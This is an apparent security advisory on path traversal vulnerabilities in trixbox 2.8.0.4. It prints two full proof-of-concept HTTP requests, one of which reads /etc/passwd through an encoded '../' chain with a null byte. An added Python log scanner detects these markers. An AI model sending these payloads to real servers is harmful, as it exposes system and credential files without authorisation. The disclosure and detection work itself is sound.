
Title: TrixBox Multiple Path Traversal Vulnerabilities
Affected Product: trixbox-2.8.0.4
Product Page: https://sourceforge.net/projects/asteriskathome/
CVSSv2: (AV:N/AC:M/Au:S/C:C/I:N/A:N) Severity: Medium
Solution Status: N/A
Credit: Sachin Wagh (@tiger_tigerboy)
Description:
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration files and critical system files.
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. (Source: OWASP).
Impact:
Remote attackers may use a specially crafted request with directory-traversal sequences (‘../’) to retrieve sensitive information.
Proof-of-Concept:
- Affected Request -1:
    POST /maint/index.php?packages HTTP/1.1
    Host: 192.168.0.6
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Method: POST http://192.168.0.6/maint/index.php?packages HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.0.6/maint/index.php?packages
    Content-Length: 160
    Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
    Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
    Connection: keep-alive

    xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f

Fig-1: Path Traversal Vulnerability
- Affected Request -2:
    GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
    Host: 192.168.0.6
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.6/maint/
    Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
    Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1

Fig-2: Path Traversal Vulnerability
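
Detection example (added here, not part of the original advisory): a Python check that percent-decodes request parameters and flags the two markers visible in the requests above, dot-dot-slash sequences and an encoded null byte. The log lines, client address and combined access-log format are constructed assumptions; the function names are hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

MAX_DECODE_ROUNDS = 3  # also unwraps double encoding such as %252e%252e%252f
DOTDOT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value: str) -> str:
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_indicators(params: str) -> list[tuple[str, str]]:
    """Return (parameter, reason) pairs for a query string or urlencoded body."""
    hits = []
    for pair in params.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw.replace("+", " "))
        if DOTDOT.search(value):
            hits.append((unquote(name), "dot-dot-slash sequence"))
        if "\x00" in value:
            hits.append((unquote(name), "null byte"))
    return hits

def scan_access_log(lines: list[str]) -> list[tuple[int, str, str]]:
    """Flag log lines whose query string carries a traversal marker."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            query = urlsplit(match.group(1)).query
            findings += [(lineno, p, r) for p, r in traversal_indicators(query)]
    return findings

# Constructed sample lines (combined log format assumed); paths mirror the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - maint [10/Sep/2017:10:01:02 +0000] "GET /maint/modules/home/index.php?lang=english HTTP/1.1" 200 5120',
    '192.0.2.10 - maint [10/Sep/2017:10:01:09 +0000] "GET /maint/modules/home/index.php?lang=..%2f..%2fetc%2fpasswd%00english HTTP/1.1" 200 1873',
    '192.0.2.10 - maint [10/Sep/2017:10:01:15 +0000] "POST /maint/index.php?packages HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The payload of Affected Request 1 travels in the POST body, which a standard access log does not record, so the third sample line is not flagged; `traversal_indicators` can be run directly on a captured body (proxy or WAF log) instead.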